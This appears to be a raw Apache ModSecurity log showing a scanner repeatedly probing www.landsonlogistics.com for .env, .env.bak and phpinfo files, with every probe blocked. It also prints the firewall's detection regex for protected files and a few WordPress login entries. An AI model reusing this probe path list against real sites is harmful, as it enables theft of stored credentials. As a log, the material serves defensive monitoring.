[Tue May 26 14:49:08.792457 2026] [security2:error] [pid 648203:tid 648454] [client 195.178.110.199:60318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/node-api/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjXgAAAP4"]
[Tue May 26 14:49:08.815394 2026] [security2:error] [pid 648203:tid 648407] [client 195.178.110.199:56234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/node/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjXwAAAM8"]
[Tue May 26 14:49:08.835089 2026] [security2:error] [pid 648203:tid 648368] [client 195.178.110.199:56192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/infophp.php"] [unique_id "ahVljLEQDDtxJNiDrdTjYQAAAKg"]
[Tue May 26 14:49:09.102531 2026] [security2:error] [pid 648203:tid 648430] [client 195.178.110.199:56216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/nodeweb/.env"] [unique_id "ahVljbEQDDtxJNiDrdTjaQAAAOY"]
[Tue May 26 14:49:09.178751 2026] [security2:error] [pid 648203:tid 648372] [client 195.178.110.199:56236] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/old/.env"] [unique_id "ahVljbEQDDtxJNiDrdTjdQAAAKw"]
[Tue May 26 14:49:09.273417 2026] [security2:error] [pid 648203:tid 648348] [client 195.178.110.199:56144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/opt/.env"] [unique_id "ahVljbEQDDtxJNiDrdTjegAAAJQ"]
[Tue May 26 14:49:09.575576 2026] [security2:error] [pid 648203:tid 648352] [client 195.178.110.199:56132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/php.php"] [unique_id "ahVljbEQDDtxJNiDrdTjkAAAAJg"]
[Tue May 26 14:49:09.580801 2026] [security2:error] [pid 648203:tid 648421] [client 195.178.110.199:56204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/php_info.php"] [unique_id "ahVljbEQDDtxJNiDrdTjkQAAAN0"]
[Tue May 26 14:49:09.651842 2026] [security2:error] [pid 648203:tid 648452] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/node/api/.env"] [unique_id "ahVljbEQDDtxJNiDrdTjlQAAAPw"]
[Tue May 26 14:49:09.868098 2026] [security2:error] [pid 648203:tid 648454] [client 195.178.110.199:56218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/php-info.php"] [unique_id "ahVljbEQDDtxJNiDrdTjqAAAAP4"]
[Tue May 26 14:49:09.928494 2026] [security2:error] [pid 648203:tid 648433] [client 45.3.38.118:63173] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVljLEQDDtxJNiDrdTjYAAAAOk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:09.933586 2026] [security2:error] [pid 648203:tid 648368] [client 195.178.110.199:56236] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/prod/.env"] [unique_id "ahVljbEQDDtxJNiDrdTjqgAAAKg"]
[Tue May 26 14:49:10.000120 2026] [security2:error] [pid 648203:tid 648339] [client 195.178.110.199:60314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/phpinfo.php"] [unique_id "ahVljbEQDDtxJNiDrdTjrAAAAIs"]
[Tue May 26 14:49:10.017777 2026] [security2:error] [pid 648203:tid 648458] [client 195.178.110.199:60462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/product/.env"] [unique_id "ahVljrEQDDtxJNiDrdTjrwAAAQI"]
[Tue May 26 14:49:10.020429 2026] [security2:error] [pid 648203:tid 648443] [client 195.178.110.199:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/portal/.env"] [unique_id "ahVljrEQDDtxJNiDrdTjsAAAAPM"]
[Tue May 26 14:49:10.223518 2026] [security2:error] [pid 648203:tid 648406] [client 195.178.110.199:56236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/public/phpinfo.php"] [unique_id "ahVljrEQDDtxJNiDrdTjuwAAAM4"]
[Tue May 26 14:49:10.252860 2026] [security2:error] [pid 648203:tid 648453] [client 195.178.110.199:56144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/public_html/.env"] [unique_id "ahVljrEQDDtxJNiDrdTjwAAAAP0"]
[Tue May 26 14:49:10.296249 2026] [security2:error] [pid 648203:tid 648456] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVljbEQDDtxJNiDrdTjpgAAAQA"]
[Tue May 26 14:49:10.302523 2026] [security2:error] [pid 648203:tid 648370] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/qa/.env"] [unique_id "ahVljrEQDDtxJNiDrdTjxAAAAKo"]
[Tue May 26 14:49:10.308416 2026] [security2:error] [pid 648203:tid 648438] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/production/.env"] [unique_id "ahVljrEQDDtxJNiDrdTjxQAAAO4"]
[Tue May 26 14:49:10.401028 2026] [security2:error] [pid 648203:tid 648460] [client 195.178.110.199:56164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/project/.env"] [unique_id "ahVljrEQDDtxJNiDrdTjzAAAAQQ"]
[Tue May 26 14:49:10.465289 2026] [security2:error] [pid 648203:tid 648451] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/public/.env"] [unique_id "ahVljrEQDDtxJNiDrdTj1QAAAPs"]
[Tue May 26 14:49:10.672793 2026] [security2:error] [pid 648203:tid 648447] [client 45.148.10.5:56140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/config.php"] [unique_id "ahVljrEQDDtxJNiDrdTj4gAAAPc"]
[Tue May 26 14:49:10.689301 2026] [security2:error] [pid 648203:tid 648371] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/public-api/.env"] [unique_id "ahVljrEQDDtxJNiDrdTj4wAAAKs"]
[Tue May 26 14:49:11.088470 2026] [security2:error] [pid 648203:tid 648445] [client 195.178.110.199:56274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/s3/.env.bak"] [unique_id "ahVlj7EQDDtxJNiDrdTkBgAAAPU"]
[Tue May 26 14:49:11.448220 2026] [security2:error] [pid 648203:tid 648399] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/server/.env"] [unique_id "ahVlj7EQDDtxJNiDrdTkHgAAAMc"]
[Tue May 26 14:49:12.079857 2026] [security2:error] [pid 648203:tid 648411] [client 104.167.19.199:31709] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVljrEQDDtxJNiDrdTkAgAAANM"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:12.702973 2026] [security2:error] [pid 648203:tid 648394] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlkLEQDDtxJNiDrdTkNwAAAMI"]
[Tue May 26 14:49:12.856025 2026] [security2:error] [pid 648203:tid 648419] [client 195.178.110.199:56234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/server/api/.env"] [unique_id "ahVlkLEQDDtxJNiDrdTkSQAAANs"]
[Tue May 26 14:49:13.061655 2026] [security2:error] [pid 648203:tid 648344] [client 195.178.110.199:56144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/server/backend/.env"] [unique_id "ahVlkbEQDDtxJNiDrdTkUQAAAJA"]
[Tue May 26 14:49:13.274372 2026] [security2:error] [pid 648203:tid 648449] [client 195.178.110.199:56216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/service/.env"] [unique_id "ahVlkbEQDDtxJNiDrdTkWAAAAPk"]
[Tue May 26 14:49:13.419827 2026] [security2:error] [pid 648203:tid 648336] [client 195.178.110.199:56216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/services/.env"] [unique_id "ahVlkbEQDDtxJNiDrdTkYQAAAIg"]
[Tue May 26 14:49:14.139325 2026] [security2:error] [pid 648203:tid 648402] [client 195.178.110.199:56276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/shared/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTkeQAAAMo"]
[Tue May 26 14:49:14.164004 2026] [security2:error] [pid 648203:tid 648341] [client 195.178.110.199:60302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/shop/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTkegAAAI0"]
[Tue May 26 14:49:14.239018 2026] [security2:error] [pid 648203:tid 648409] [client 65.111.1.58:47431] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlkbEQDDtxJNiDrdTkVAAAANE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:14.331989 2026] [security2:error] [pid 648203:tid 648412] [client 195.178.110.199:60462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/src/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTkgAAAANQ"]
[Tue May 26 14:49:14.472609 2026] [security2:error] [pid 648203:tid 648445] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/staging/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTkhQAAAPU"]
[Tue May 26 14:49:14.618140 2026] [security2:error] [pid 648203:tid 648393] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/stg/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTkkAAAAME"]
[Tue May 26 14:49:14.888603 2026] [security2:error] [pid 648203:tid 648362] [client 195.178.110.199:56164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/srv/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTkmwAAAKI"]
[Tue May 26 14:49:14.895271 2026] [security2:error] [pid 648203:tid 648373] [client 195.178.110.199:56252] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/stage/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTknAAAAK0"]
[Tue May 26 14:49:15.238915 2026] [autoindex:error] [pid 648203:tid 648420] [client 208.84.101.17:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/mosykay.com/training/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:49:15.295720 2026] [security2:error] [pid 648203:tid 648408] [client 195.178.110.199:56260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/test.php"] [unique_id "ahVlk7EQDDtxJNiDrdTkwAAAANA"]
[Tue May 26 14:49:15.333879 2026] [security2:error] [pid 648203:tid 648374] [client 195.178.110.199:60462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/test/.env"] [unique_id "ahVlk7EQDDtxJNiDrdTkwQAAAK4"]
[Tue May 26 14:49:15.454190 2026] [security2:error] [pid 648203:tid 648359] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/user/.env"] [unique_id "ahVlk7EQDDtxJNiDrdTkyQAAAJ8"]
